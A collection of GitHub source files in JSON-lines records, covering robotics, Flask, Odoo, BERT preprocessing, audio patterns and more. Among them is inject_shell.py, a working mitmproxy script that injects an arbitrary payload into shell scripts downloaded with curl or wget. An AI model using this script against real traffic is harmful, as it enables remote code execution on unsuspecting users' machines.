Stops and sets either to given position and orientation or to the base\n position and base orientation.\n\n Parameters\n ----------\n pos : list\n Optional position to reset to\n angle : float\n Optional angle to reset orientation to\n \"\"\"\n self.stop()\n\n position = pos or self.base_position\n orientation = self.sim.getQuaternionFromEuler([0., 0., angle])\\\n if angle else self.base_orientation\n\n self.sim.resetBasePositionAndOrientation(self.robot,\n position,\n orientation)\n\n def get_pos_and_orientation(self):\n \"\"\"Get the robots current position and orientation\n\n Returns\n -------\n Tuple[float, float, float]\n x, y and rho\n \"\"\"\n pos, orientation = self.sim.getBasePositionAndOrientation(self.robot)\n angle = self.sim.getEulerFromQuaternion(orientation)[2]\n\n return pos[0], pos[1], angle\n\n def get_velocity(self):\n \"\"\"Get the robots velocities\n\n Returns\n -------\n Tuple[float, float, float]\n dx, dy, drho\n \"\"\"\n velocity = self.sim.getBaseVelocity(self.robot)\n\n return velocity[0][0], velocity[0][1], velocity[1][2]\n","repo_name":"dfki-ric-quantum/qdrl-turtlebot-env","sub_path":"qturtle/turtlebot.py","file_name":"turtlebot.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4856032362","text":"from flask import Flask, render_template\nfrom doc2vec import *\nimport sys\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef articles():\n \"\"\"Show a list of article titles\"\"\"\n return render_template('articles.html', article_list = articles)\n\n@app.route(\"/article//\")\ndef article(topic,filename):\n \"\"\"\n Show an article with relative path filename. Assumes the BBC structure of\n topic/filename.txt so our URLs follow that.\n \"\"\"\n articlename = '/%s/%s' %(topic, filename)\n for a in articles:\n if a[0] == articlename:\n article = a\n recommend = recommended(article, articles, 5)\n title = article[1]\n textlist = article[2].split('\\n\\n')\n return render_template('article.html', title = title, textlist = textlist, rec_list = recommend)\n\n\n# initialization\ni = sys.argv.index('server:app')\nglove_filename = sys.argv[i+1]\narticles_dirname = sys.argv[i+2]\n\ngloves = load_glove(glove_filename)\narticles = load_articles(articles_dirname, gloves)\n","repo_name":"Hatchin/school-projects","sub_path":"article-recommendation/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9396954175","text":"#!/usr/bin/python\n\n# Usage: mitmdump -s \"inject_shell.py payload.sh\"\n# (this script works best with --anticache)\nfrom libmproxy.protocol.http import decoded\n\n\ndef start(context, argv):\n if len(argv) != 2:\n raise ValueError('Usage: -s \"inject_shell.py payload.sh\"')\n context.payload = get_payload(argv[1])\n\n\ndef get_payload(payload_file):\n \"\"\"\n Read the payload file, and strip out the shebang if it exists\n \"\"\"\n f = open(payload_file, 'r')\n lines = f.readlines()\n if lines[0].startswith(\"#!\"):\n lines = lines[1:]\n f.close()\n return '\\n'.join(lines)\n\n\ndef is_shell_script(resp):\n \"\"\"\n Returns true if the request is a possible shell script\n \"\"\"\n shell_content_type = False\n content_type = resp.headers.get_first(\"content-type\", \"\")\n # if content-type is set, should be text/*\n if content_type != \"\" and not content_type.startswith('text/'):\n return False\n # and should start with 
shebang\n if not resp.content.startswith('#!'):\n return False\n return True\n\n\ndef is_cli_tool(req):\n \"\"\"\n Returns true if the user-agent looks like curl or wget\n \"\"\"\n user_agent = req.headers.get_first(\"User-Agent\", \"\")\n if user_agent.startswith('curl'):\n return True\n if user_agent.startswith('Wget'):\n return True\n return False\n\n\ndef response(context, flow):\n resp = flow.response\n req = flow.request\n with decoded(resp):\n if is_shell_script(resp) and is_cli_tool(req):\n flow.response.content = flow.response.content.replace(\n '\\n',\n '\\n' + context.payload + '\\n',\n 1)","repo_name":"chrishepner/sh-mitm","sub_path":"inject_shell.py","file_name":"inject_shell.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"28286709770","text":"class Solution(object):\n def numSquares(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n dp = {}\n dp[0] = 0\n dp[1] = 1\n for i in range(2, n+1):\n minsteps = n\n for j in range(int(i**0.5), 0, -1):\n minsteps = min(minsteps,dp[i-(j*j)] + 1)\n dp[i] = minsteps\n \n return dp[n]\n","repo_name":"qasim-mansoor/Leetcode","sub_path":"Perfect Squares.py","file_name":"Perfect Squares.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19001816958","text":"import re\r\n\r\n\r\ndef get_frequency(string): # define the function for getting the characters' frequency\r\n frequency = {} # define a dictionary that will hold every character with its frequency\r\n pattern = r'[^\\s\\n\\r\\b\\t\\f\\v\\a]' # regex created to avoid cases where a special character is counted\r\n for char in string: # loop through the characters of the string\r\n if re.match(pattern, char): # check if the character matches the regex\r\n if char in frequency: # check if the character is already in the dictionary\r\n frequency[char] += 1 # if it is, increment its frequency\r\n else:\r\n frequency[char] = 1 # if it's not, add the character to the dictionary\r\n # sort the dictionary by value to create a list that contains every character with its frequency\r\n frequency_list = sorted(frequency.items(), key=lambda item: item[1],\r\n reverse=True)\r\n result = '' # define an empty string that will hold the final result\r\n for char, freq in frequency_list: # loop through the list's items\r\n result += char + str(freq) # add the character and its frequency to the final string\r\n return result\r\n\r\n\r\nif __name__ == '__main__':\r\n input1 = \"testinnput\"\r\n input2 = \" \\n\\r\\b\\t\\f\\v\\atestinnput\"\r\n output1 = get_frequency(input1)\r\n output2 = get_frequency(input2)\r\n print(output1)\r\n print(output2)\r\n","repo_name":"barbubo/char_freq","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13548194350","text":"from odoo import api, fields, models\n\n\nclass QCWorksheetQuestion(models.Model):\n _name = \"qc_worksheet.question\"\n _description = \"QC Worksheet - Question\"\n _order = \"worksheet_id, sequence\"\n\n worksheet_id = fields.Many2one(\n string=\"QC Worksheet\",\n comodel_name=\"qc_worksheet\",\n required=True,\n ondelete=\"cascade\",\n )\n sequence = fields.Integer(\n string=\"Sequence\",\n required=True,\n default=5,\n readonly=True,\n )\n name = fields.Char(\n string=\"Question\",\n required=True,\n 
readonly=True,\n )\n type = fields.Selection(\n string=\"Type\",\n selection=[\n (\"qualitative\", \"Qualitative\"),\n (\"quantitative\", \"Quantitative\"),\n ],\n required=True,\n )\n set_id = fields.Many2one(\n string=\"Value Set\",\n comodel_name=\"qc_value_set\",\n readonly=True,\n )\n allowed_qc_value_ids = fields.Many2many(\n string=\"Allowed QC Value\",\n comodel_name=\"qc_value_item\",\n compute=\"_compute_allowed_qc_value_ids\",\n store=False,\n )\n qualitative_value_id = fields.Many2one(\n string=\"Qualitative Value\",\n comodel_name=\"qc_value_item\",\n )\n quantitative_value = fields.Float(\n string=\"Quantitative Value\",\n )\n min_value = fields.Float(\n string=\"Min. Value\",\n )\n max_value = fields.Float(\n string=\"Max. Value\",\n )\n uom_id = fields.Many2one(\n string=\"UoM\",\n comodel_name=\"uom.uom\",\n readonly=True,\n )\n valid_values = fields.Char(\n string=\"Valid Values\",\n compute=\"_compute_valid_values\",\n store=True,\n )\n success = fields.Boolean(\n string=\"Success?\",\n compute=\"_compute_result\",\n store=True,\n )\n\n @api.depends(\n \"set_id\",\n )\n def _compute_allowed_qc_value_ids(self):\n for record in self:\n result = self.env[\"qc_value_item\"]\n if record.set_id:\n for item in record.set_id.value_ids:\n result += item.item_id\n record.allowed_qc_value_ids = result\n\n @api.depends(\n \"allowed_qc_value_ids\",\n \"min_value\",\n \"max_value\",\n \"type\",\n \"set_id\",\n )\n def _compute_valid_values(self):\n for record in self:\n if record.type == \"qualitative\":\n criteria = [\n (\"set_id\", \"=\", record.set_id.id),\n (\"item_id\", \"=\", record.qualitative_value_id.id),\n (\"ok\", \"=\", True),\n ]\n values = self.env[\"qc_value_set.value\"].search(criteria)\n record.valid_values = \", \".join([x.name for x in values])\n elif record.type == \"quantitative\":\n record.valid_values = \"{}-{}\".format(record.min_value, record.max_value)\n\n @api.depends(\n \"type\",\n \"max_value\",\n \"min_value\",\n \"quantitative_value\",\n \"qualitative_value_id\",\n \"allowed_qc_value_ids\",\n \"set_id\",\n )\n def _compute_result(self):\n for record in self:\n if record.type == \"qualitative\":\n criteria = [\n (\"set_id\", \"=\", record.set_id.id),\n (\"item_id\", \"=\", record.qualitative_value_id.id),\n ]\n values = self.env[\"qc_value_set.value\"].search(criteria)\n if len(values) > 0:\n record.success = values[0].ok\n else:\n record.success = (\n record.max_value >= record.quantitative_value >= record.min_value\n )\n","repo_name":"open-synergy/ssi-quality-control","sub_path":"ssi_quality_control/models/qc_worksheet_question.py","file_name":"qc_worksheet_question.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37236692227","text":"from Level import *\nimport random\n\n\nclass Game:\n def __init__(self, id):\n self.id = id\n self.entities = []\n self.__maps = []\n self.__current_map = 0\n\n self.__map_1 = self.__load_map(\"Leveleditor/Files/level1.json\")\n self.__map_2 = self.__load_map(\"Leveleditor/Files/level2.json\")\n\n def current_map_index_plus(self):\n self.__current_map += 1\n if len(self.__maps) >= self.__current_map:\n self.__current_map = len(self.__maps) - 1\n return False\n\n return True\n\n def __remove_from_list(self, item, list):\n lst = []\n e = list\n e.remove(item)\n for i in e:\n lst.append(i)\n\n return lst\n\n def get_random_map_entities(self):\n random_map = random.choice(self.__maps)\n return 
self.get_map_entities(random_map)\n\n\n def get_map_entities(self, map=None):\n if map == None:\n map = self.__maps[self.__current_map]\n\n spawn_x = 0\n spawn_y = 0\n for i in map:\n if i[2] == \"SPAWN_POINT\":\n spawn_x = i[0] + (37 * len(self.entities))\n spawn_y = i[1]\n break\n\n name = map[-1]\n map.remove(map[-1])\n\n return map, [spawn_x, spawn_y], name\n\n def reset_map(self, name, map):\n for m in self.__maps:\n if map == m:\n m.append(name)\n break\n\n return map\n\n def __load_map(self, path):\n map, name = load(path)\n map.append(name)\n self.__maps.append(map)\n return map, name\n\n\n def get_entities_without_one_index(self, index):\n lst = []\n for i in range(len(self.entities)):\n if i != index:\n lst.append(self.entities[i])\n\n return lst\n\n","repo_name":"emecoding/Multiplayer2D","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14606693314","text":"import wbgapi as wb \r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt\r\nimport plotly.express as px\r\n\r\n\r\npais_input = input(\"Pais a buscar: \")\r\npais = wb.economy.info(q=pais_input)\r\n\r\nprint(pais)\r\n\r\nid_input = input(\"Seleccione el id: \")\r\n\r\n\r\n\r\ndata_list = []\r\nchoice = 0\r\n\r\ntema_input = str(input(\"Variable a buscar: \"))\r\ntema = wb.series.list(q=tema_input)\r\n\r\nfor id in tema:\r\n id_title = id[\"id\"]\r\n data_list.append(id_title)\r\n print(str(choice) + \": \" + str(id[\"value\"]))\r\n choice = choice + 1\r\n\r\nselection = int(input(\"Seleccione el indicador deseado: \"))\r\n\r\naño_inicio = int(input(\"Seleccione el año de inicio: \"))\r\naño_final = int(input(\"Seleccione el año final: \"))\r\n\r\ndata = wb.data.DataFrame(data_list[selection], id_input, range(año_inicio, año_final), index=\"time\",numericTimeKeys=True, \r\n labels=True).plot(figsize=(10, 6))\r\n\r\nplt.title(str(id[\"value\"]))\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"JesusPerezPaco/BM_PYTHON","sub_path":"indicadores.py","file_name":"indicadores.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29337778812","text":"\"\"\"\r\nimport json\r\n\r\n# python列表转为json\r\ndata01 = [{\"ZRF\": \"周润发\", \"age\": 19}, {\"CSY\": 2, \"age\": 20}, {\"sty\": 3, \"age\": 23}]\r\n\r\ndata01_json = json.dumps(data01, ensure_ascii=False)\r\nprint(\"data01_json的类型是:{}\".format(type(data01_json)))\r\nprint(data01_json)\r\n\r\n# python字典转为json\r\ndata02 = {\"HJT\": \"胡锦涛\", \"add\": \"中南海\"}\r\n\r\ndata02_json = json.dumps(data02, ensure_ascii=False)\r\nprint(\"data02_json的类型是:{}\".format(type(data01_json)))\r\nprint(data02_json)\r\n\r\n# json转回python(经过上述转换已有data01_json、data02_json)\r\ndata01_py = json.loads(data01_json)\r\n\r\nprint(type(data01_py))\r\nprint(data01_py)\r\n\r\ndata02_py = json.loads(data02_json)\r\n\r\nprint(type(data02_py))\r\nprint(data02_py)\r\n\"\"\"\r\n\r\n# pyecharts入门\r\nfrom pyecharts.charts import Line\r\nfrom pyecharts.options import TitleOpts, LegendOpts, ToolboxOpts, VisualMapOpts\r\n\r\nline = Line()\r\nline.add_xaxis([\"中国\", \"日本\", \"韩国\"])\r\nline.add_yaxis(\"GDP\", [30, 20, 10])\r\n\r\nline.set_global_opts(\r\n title_opts=TitleOpts(title = \"GDP图标\", pos_left=\"center\", pos_bottom=\"1%\"),\r\n legend_opts=LegendOpts(is_show=True),\r\n toolbox_opts=ToolboxOpts(is_show=True),\r\n 
visualmap_opts=VisualMapOpts(is_show=True)\r\n)\r\n\r\nline.render()\r\n\r\n","repo_name":"ShenTengyu/python_learning","sub_path":"practice_py/practice/practice_projects/project01/project01.py","file_name":"project01.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13073500811","text":"### The code below automatically formats a dataset to be ready for use by BERT:\nimport pandas as pd\nimport csv\nimport string\nfrom preprocessing_utils import num_balanced_labels\n\ndata_col = \"your_data\"\nlabel_col = \"data_label\"\n\n### Load in the file to be converted into bert datasets\n## Enter the name of the original dataset\nBERT_file_in = \"original_data.csv\"\n## Read in the original dataset\n# NOTE: The read_csv function may not be able to read data with encoding 'utf-8' if the data\n# contains improper values for this encoding. These values must be removed before this\n# step since BERT requires proper data.\ndf = pd.read_csv(BERT_file_in, engine = 'python', encoding='utf-8');\n\n### Create the three required train/test/dev datasets for bert:\n## Creates the three required datasets for BERT using balanced and clean data\n## Initialize the lists of text data and the associated labels\ndev_coms = []\ntest_coms = []\ntrain_coms = []\ndev_lab = []\ntest_lab = []\ntrain_lab = []\n## Initialize the counts of classes true/false for each dataset\nd_no = 0\nte_no = 0\ntr_no = 0\nd_yes = 0\nte_yes = 0\ntr_yes = 0\n## Clean the data and determine/allot the balanced class quantities to each dataset\nnum_labels = num_balanced_labels(data_col, label_col, df)\nsplit_value = int(num_labels * 0.1) # This results in 80-10-10% train/test/dev split with balanced data for each dataset\n## Portion the data into each list\nfor i in range(len(df)):\n    val = int(df['ID'][i])\n    text = df['Label'][i]\n    if text == \"\" or isinstance(text, str) == False or text == \" \":\n        continue\n    text = \"\".join(filter(lambda char: char in string.printable, text))\n    text = text.strip()\n    if val == 0:\n        if d_no != split_value:\n            d_no = d_no + 1\n            dev_lab.append(val)\n            dev_coms.append(text)\n        elif te_no != split_value:\n            te_no = te_no + 1\n            test_lab.append(val)\n            test_coms.append(text)\n        else:\n            tr_no = tr_no + 1\n            train_lab.append(val)\n            train_coms.append(text)\n    else:\n        if d_yes != split_value:\n            d_yes = d_yes + 1\n            dev_lab.append(val)\n            dev_coms.append(text)\n        elif te_yes != split_value:\n            te_yes = te_yes + 1\n            test_lab.append(val)\n            test_coms.append(text)\n        else:\n            tr_yes = tr_yes + 1\n            train_lab.append(val)\n            train_coms.append(text)\nprint(\"The number of observations for the train/test/dev datasets is:\")\nprint(len(train_coms), len(test_coms), len(dev_coms))\n## Create the datasets, only the test dataset is supposed to have a header\nwith open('dev.csv', 'w', newline = '') as f:\n    writer = csv.writer(f)\n    # Unofficial header is [\"ID\", \"Label\", \"Throwaway\", \"Text\"]\n    for i in range(len(dev_coms)):\n        val = dev_lab[i]\n        text = dev_coms[i]\n        writer.writerow([ i, val, 'a', text])\nwith open('test.csv', 'w', newline = '') as f:\n    writer = csv.writer(f)\n    writer.writerow([\"id\", \"Label\", \"sentence\"])\n    for i in range(len(test_coms)):\n        val = test_lab[i]\n        text = test_coms[i]\n        writer.writerow([ i, val, text])\nwith open('train.csv', 'w', newline = '') as f:\n    writer = csv.writer(f)\n    # Unofficial header is [\"ID\", \"Label\", \"Throwaway\", \"Text\"]\n    for i in range(len(train_coms)):\n        val = train_lab[i]\n        text = 
train_coms[i]\n writer.writerow([ i, val, 'a', text])\n## BERT requires tsv files so this creates tsv versions of the newly formed datasets\ndf = pd.read_csv('dev.csv')\ndf.to_csv('dev.tsv', sep='\\t', index=False, header=False)\ndf = pd.read_csv('test.csv')\ndf.to_csv('test.tsv', sep='\\t', index=False, header=True)\ndf = pd.read_csv('train.csv')\ndf.to_csv('train.tsv', sep='\\t', index=False, header=False)","repo_name":"ushvarma/PeerLogic","sub_path":"src/data_preprocessing/bert_prerprocessing.py","file_name":"bert_prerprocessing.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20950956035","text":"from torchvision import transforms\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nimport os\nimport numpy as np\nimport pandas as pd\nimport cv2\nfrom imgaug import augmenters as iaa\nimport random\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\nimport warnings\n\nwarnings.filterwarnings('ignore')\nRESIZE_SIZE = int(224 * 1.2)\n\n\ndef random_cropping(image, target_shape=(224, 224, 3), is_random=True):\n image = cv2.resize(image, (RESIZE_SIZE, RESIZE_SIZE))\n target_h, target_w, _ = target_shape\n height, width, _ = image.shape\n if is_random:\n start_x = random.randint(0, width - target_w)\n start_y = random.randint(0, height - target_h)\n else:\n start_x = (width - target_w) // 2\n start_y = (height - target_h) // 2\n\n zeros = image[start_y:start_y + target_h, start_x:start_x + target_w, :]\n return zeros\n\n\ndef random_resize(img, probability=0.5, minRatio=0.2):\n if random.uniform(0, 1) > probability:\n return img\n\n ratio = random.uniform(minRatio, 1.0)\n\n h = img.shape[0]\n w = img.shape[1]\n\n new_h = int(h * ratio)\n new_w = int(w * ratio)\n\n img = cv2.resize(img, (new_w, new_h))\n img = cv2.resize(img, (w, h))\n return img\n\n\ndef TTA_36_cropps(image, target_shape=(224, 224, 3)):\n image = cv2.resize(image, (RESIZE_SIZE, RESIZE_SIZE))\n\n width, height, d = image.shape\n target_w, target_h, d = target_shape\n\n start_x = (width - target_w) // 2\n start_y = (height - target_h) // 2\n\n starts = [[start_x, start_y],\n\n [start_x - target_w, start_y],\n [start_x, start_y - target_w],\n [start_x + target_w, start_y],\n [start_x, start_y + target_w],\n\n [start_x + target_w, start_y + target_w],\n [start_x - target_w, start_y - target_w],\n [start_x - target_w, start_y + target_w],\n [start_x + target_w, start_y - target_w],\n ]\n\n images = []\n\n for start_index in starts:\n image_ = image.copy()\n x, y = start_index\n\n if x < 0:\n x = 0\n if y < 0:\n y = 0\n\n if x + target_w >= RESIZE_SIZE:\n x = RESIZE_SIZE - target_w - 1\n if y + target_h >= RESIZE_SIZE:\n y = RESIZE_SIZE - target_h - 1\n\n zeros = image_[x:x + target_w, y: y + target_h, :]\n\n image_ = zeros.copy()\n\n zeros = np.fliplr(zeros)\n image_flip_lr = zeros.copy()\n\n zeros = np.flipud(zeros)\n image_flip_lr_up = zeros.copy()\n\n zeros = np.fliplr(zeros)\n image_flip_up = zeros.copy()\n\n images.append(image_.reshape([1, target_shape[0], target_shape[1], target_shape[2]]))\n images.append(image_flip_lr.reshape([1, target_shape[0], target_shape[1], target_shape[2]]))\n images.append(image_flip_up.reshape([1, target_shape[0], target_shape[1], target_shape[2]]))\n images.append(image_flip_lr_up.reshape([1, target_shape[0], target_shape[1], target_shape[2]]))\n\n return images\n\n\ndef transform_image1(image, target_shape=(224, 224, 3), is_infer=False):\n if 
is_infer:\n augment_img = iaa.Sequential([\n iaa.Fliplr(0),\n ])\n\n image = augment_img.augment_image(image)\n image = TTA_36_cropps(image, target_shape)\n return image\n\n else:\n augment_img = iaa.Sequential([\n iaa.Fliplr(0.5),\n iaa.Flipud(0.5),\n iaa.Affine(rotate=(-30, 30)),\n ], random_order=True)\n\n image = augment_img.augment_image(image)\n image = random_resize(image)\n image = random_cropping(image, target_shape, is_random=True)\n return image\n\n\ndef transform_image(image, im_size=224, task='train'):\n if task == 'train':\n tf = A.Compose([A.Downscale(scale_min=0.25, scale_max=0.5, p=0.5),\n A.Affine(scale=(1.5, 2.0), keep_ratio=True, p=0.5),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.5),\n A.Resize(height=im_size, width=im_size, always_apply=True),\n A.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ToTensorV2(always_apply=True),\n ],\n p=1.0,\n )\n else:\n tf = A.Compose([A.Resize(height=im_size, width=im_size, always_apply=True),\n A.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ToTensorV2(always_apply=True)],\n p=1.0,\n )\n return tf(image=image)['image'].float()\n\n\nclass FAS_Dataset(Dataset):\n def __init__(self, df, video_dir, transforms=transform_image):\n self.df = df.reset_index(drop=True)\n self.video_dir = video_dir\n self.transforms = transforms\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, item):\n row = self.df.iloc[item]\n vid_name = row['fname']\n vid_path = os.path.join(self.video_dir, vid_name)\n cap = cv2.VideoCapture(vid_path)\n frame_no = row['frame_index']\n cap.set(1, frame_no) # Where frame_no is the frame you want\n ret, im = cap.read()\n im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)\n\n im_ts = self.transforms(im)\n\n if 'liveness_score' in self.df.columns:\n label = torch.tensor(row['liveness_score']).float()\n else:\n label = -1\n return im_ts, label\n\n\nif __name__ == '__main__':\n df = pd.read_csv(\n r\"/Users/nguyenbaophuoc/Desktop/Studying/My_work/Zalo_AI_Face_Anti_Spoofing/dataset/train/label_3_frame_5folds.csv\")\n df = df[df['fold'] == 0]\n from functools import partial\n dataset = FAS_Dataset(df,\n video_dir=r'/Users/nguyenbaophuoc/Desktop/Studying/My_work/Zalo_AI_Face_Anti_Spoofing/dataset/train/videos',\n transforms=partial(transform_image, task='train'))\n\n import matplotlib.pyplot as plt\n\n train_dl = DataLoader(dataset, batch_size=1, shuffle=True)\n it = iter(train_dl)\n fgx, ax = plt.subplots(nrows=4, ncols=5, figsize=(14, 8))\n ax = ax.flatten()\n for i in range(20):\n image, label = next(it)\n ax[i].imshow(image.squeeze().permute(1, 2, 0))\n ax[i].set_title(label)\n # print(image.max(), image.min())\n # print(label.dtype)\n plt.show()\n","repo_name":"baophuoc1903/Zalo_AI_Face_Anti_Spoofing","sub_path":"dataset/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":6441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72994689769","text":"import bisect\nfrom typing import Dict\nfrom uuid import UUID, uuid4\n\nfrom uqbar.objects import get_vars, new\n\nfrom supriya.assets import synthdefs\nfrom supriya.enums import CalculationRate\n\nfrom .events import (\n BusAllocateEvent,\n BusFreeEvent,\n CompositeEvent,\n GroupAllocateEvent,\n NodeFreeEvent,\n NullEvent,\n SynthAllocateEvent,\n)\nfrom .patterns import Pattern\n\n\nclass BusPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(\n self, pattern, calculation_rate=\"audio\", channel_count=1, release_time=0.25\n ):\n self._pattern = 
pattern\n self._calculation_rate = CalculationRate.from_expr(calculation_rate)\n self._channel_count = channel_count\n self._release_time = release_time\n\n ### PRIVATE METHODS ###\n\n def _adjust(self, expr, state):\n args, _, kwargs = get_vars(expr)\n updates = {}\n if hasattr(expr, \"target_node\") and expr.target_node is None:\n updates[\"target_node\"] = state[\"group\"]\n if hasattr(expr, \"synthdef\"):\n synthdef = getattr(expr, \"synthdef\") or synthdefs.default\n parameter_names = synthdef.parameter_names\n for name in (\"in_\", \"out\"):\n if name in parameter_names and kwargs.get(name) is None:\n updates[name] = state[\"bus\"]\n if updates:\n return new(expr, **updates)\n return expr\n\n def _iterate(self, state=None):\n return iter(self._pattern)\n\n def _setup_peripherals(self, state):\n rate = self._calculation_rate.name.lower()\n link_synthdef_name = f\"system_link_{rate}_{self._channel_count}\"\n starts = [\n BusAllocateEvent(\n calculation_rate=self._calculation_rate,\n channel_count=self._channel_count,\n id_=state[\"bus\"],\n ),\n GroupAllocateEvent(id_=state[\"group\"]),\n SynthAllocateEvent(\n add_action=\"ADD_AFTER\",\n amplitude=1.0,\n fade_time=self._release_time,\n in_=state[\"bus\"],\n synthdef=getattr(synthdefs, link_synthdef_name),\n target_node=state[\"group\"],\n id_=state[\"link\"],\n ),\n ]\n stops = [\n NodeFreeEvent(id_=state[\"link\"]),\n NodeFreeEvent(id_=state[\"group\"]),\n BusFreeEvent(id_=state[\"bus\"]),\n ]\n if self._release_time:\n stops.insert(1, NullEvent(delta=self._release_time))\n return CompositeEvent(starts), CompositeEvent(stops)\n\n def _setup_state(self) -> Dict[str, UUID]:\n return {\"bus\": uuid4(), \"link\": uuid4(), \"group\": uuid4()}\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n return self._pattern.is_infinite\n\n\nclass FxPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, pattern, synthdef, release_time=0.25, **kwargs):\n self._pattern = pattern\n self._release_time = release_time\n self._synthdef = synthdef\n self._kwargs = kwargs\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n return iter(self._pattern)\n\n def _setup_peripherals(self, state):\n starts = [\n SynthAllocateEvent(\n add_action=\"ADD_TO_TAIL\",\n synthdef=self._synthdef,\n id_=state[\"synth\"],\n **self._kwargs,\n )\n ]\n stops = [NodeFreeEvent(id_=state[\"synth\"])]\n if self._release_time:\n stops.insert(0, NullEvent(delta=self._release_time))\n return CompositeEvent(starts), CompositeEvent(stops)\n\n def _setup_state(self):\n return {\"synth\": uuid4()}\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n return self._pattern.is_infinite\n\n\nclass GroupPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, pattern, release_time=0.25):\n self._pattern = pattern\n self._release_time = release_time\n\n ### PRIVATE METHODS ###\n\n def _adjust(self, expr, state):\n updates = {}\n if hasattr(expr, \"target_node\") and expr.target_node is None:\n updates[\"target_node\"] = state[\"group\"]\n if updates:\n return new(expr, **updates)\n return expr\n\n def _iterate(self, state=None):\n return iter(self._pattern)\n\n def _setup_peripherals(self, state):\n starts = [GroupAllocateEvent(add_action=\"ADD_TO_HEAD\", id_=state[\"group\"])]\n stops = [NodeFreeEvent(id_=state[\"group\"])]\n if self._release_time:\n stops.insert(0, NullEvent(delta=self._release_time))\n return CompositeEvent(starts), CompositeEvent(stops)\n\n def _setup_state(self):\n return {\"group\": uuid4()}\n\n ### PUBLIC 
PROPERTIES ###\n\n @property\n def is_infinite(self):\n return self._pattern.is_infinite\n\n\nclass ParallelPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, patterns):\n self._patterns = tuple(patterns)\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n should_stop = False\n iterators = []\n for index, pattern in enumerate(self._patterns):\n iterators.append((0.0, index, iter(pattern)))\n while iterators:\n grouping_offset = iterators[0][0]\n events = []\n while iterators and iterators[0][0] == grouping_offset:\n offset, index, iterator = iterators.pop(0)\n try:\n if should_stop:\n event = iterator.send(should_stop)\n else:\n event = next(iterator)\n events.append(event)\n triple = (offset + event.delta, index, iterator)\n insert_index = bisect.bisect_left(iterators, triple)\n iterators.insert(insert_index, triple)\n except StopIteration:\n pass\n if events:\n if iterators:\n delta = iterators[0][0] - grouping_offset\n else:\n delta = max(event.delta for event in events)\n if len(events) == 1:\n sent = yield new(events[0], delta=delta)\n elif len(events) > 1:\n sent = yield CompositeEvent(\n [new(x, delta=0.0) for x in events], delta=delta\n )\n if sent:\n should_stop = True\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n return any(pattern.is_infinite for pattern in self._patterns)\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"supriya/patterns/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"26309306979","text":"\"\"\" Bezier curve as a B-spline curve \"\"\"\nfrom larlib import *\n\ncontrols = [[0,1],[0,0],[1,1],[1,0]]\nbezier = larBezierCurve(controls)\ndom = larIntervals([32])([1])\nobj = larMap(bezier)(dom)\nVIEW(STRUCT( MKPOLS(obj) + [POLYLINE(controls)] ))\n\nknots = [0,0,0,0,1,1,1,1]\nbspline = BSPLINE(3)(knots)(controls)\ndom = larIntervals([100])([knots[-1]-knots[0]])\nobj = larMap(bspline)(dom)\nVIEW(STRUCT( MKPOLS(obj) + [POLYLINE(controls)] ))\n","repo_name":"cvdlab/lar-cc","sub_path":"test/py/splines/test09.py","file_name":"test09.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17519788406","text":"from math import pi, sin, asin, cos, atan2, sqrt\n\n__RADIAN__ = pi/180.0\n__RADIUS__ = 6371.01\n\nclass Point :\n\tdef __init__(self, latitude=0.0, longitude=0.0) 